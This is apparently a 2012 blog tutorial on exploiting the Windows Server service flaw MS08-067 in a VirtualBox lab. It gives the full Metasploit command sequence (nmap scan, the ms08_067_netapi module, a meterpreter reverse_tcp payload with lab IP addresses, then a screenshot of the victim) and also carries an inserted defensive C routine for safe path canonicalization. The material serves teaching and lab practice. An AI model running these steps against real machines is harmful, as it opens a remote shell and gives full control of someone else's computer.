
Hacking Windows XP Using Backtrack

Posted by Mohsin On 12/28/2012 05:29:00 AM 1 comment


In this article I am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service (CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service vulnerability.


Details about Server Service Vulnerability (MS08-067):
 

The Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused by an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by, for example, sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to a vulnerable system results in complete compromise of that computer.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. However, attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.
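
The bug class described above, an error in handling directory traversal sequences while canonicalizing a path, can be illustrated from the defensive side. The following C routine is an added example, not Microsoft's code and not part of the original article: the hypothetical function canon_path collapses "." and ".." components while checking both ends of the output buffer, and rejects any path whose ".." would climb above the root. The sample paths are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (illustration only): collapse "." and ".." in a
 * backslash-separated path. Returns 0 on success, -1 if the result does
 * not fit in out or if ".." would climb above the root. */
int canon_path(const char *in, char *out, size_t outsz)
{
    size_t len = 0;                       /* bytes written to out so far */
    const char *p = in;

    if (outsz < 2) return -1;             /* need room for "\" plus NUL */
    while (*p) {
        while (*p == '\\') p++;           /* skip a run of separators */
        const char *start = p;
        while (*p && *p != '\\') p++;     /* find the end of the component */
        size_t n = (size_t)(p - start);
        if (n == 0) break;                /* trailing separator, input done */
        if (n == 1 && start[0] == '.') continue;
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (len == 0) return -1;      /* nothing to remove: reject */
            while (len > 0 && out[len - 1] != '\\') len--;  /* drop name */
            if (len > 0) len--;           /* drop its leading separator */
            continue;
        }
        if (len + 1 + n + 1 > outsz) return -1;  /* separator + name + NUL */
        out[len++] = '\\';
        memcpy(out + len, start, n);
        len += n;
    }
    if (len == 0) out[len++] = '\\';      /* everything collapsed to root */
    out[len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample inputs, not taken from any real request. */
    const char *samples[] = { "\\share\\docs\\..\\file.txt", "\\a\\..\\..\\b" };
    char buf[64];
    for (size_t i = 0; i < 2; i++)
        printf("%s -> %s\n", samples[i],
               canon_path(samples[i], buf, sizeof buf) == 0 ? buf : "(rejected)");
    return 0;
}
```

The write index is only decremented while it is greater than zero, so a run of ".." components cannot move it before the start of the buffer, and every append is checked against the buffer size first.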


Exploiting MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS (XP)


Step 1:

Create two virtual machines (VMs) named "Target" and "BT5". Install XP inside the Target VM and Backtrack inside the BT5 VM. Start both VMs.



Step 2: Find the IP address of Target

 

Open the command prompt in the Target machine (XP). Type "ipconfig" to find the IP address of the Target system.

 

Step 3: Information Gathering
 

Now let us collect some information about the Target machine. For this purpose, we are going to use the nmap tool.

Open the Terminal in the BT5 machine (Backtrack) and type "nmap -O 192.168.56.12". Here 192.168.56.12 is the IP address of the Target machine. If you look at the result, you can find the list of open ports and the OS version.



Step 4: Metasploit
 

Now open the Terminal in the BT5 machine (Backtrack) and type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and gives you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the search command to find the exploit modules with the keyword netapi. Type "search netapi". Now you can see the list of modules that match netapi.

We are going to exploit MS08-067, so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
 

As usual, let us use the reverse TCP payload for this exploit as well. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
 

Type "set LHOST 192.168.56.10". Here 192.168.56.10 is the IP address of the Backtrack machine. You can find the IP address by typing the 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12". Here 192.168.56.12 is the IP address of the Target machine.










Step 7: Exploiting
 

OK, it is time to exploit the vulnerability. Type "exploit" in the console. If the exploit is successful, you can see the following result.












Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab a screenshot of the victim system.


I hope you understand and enjoy this.
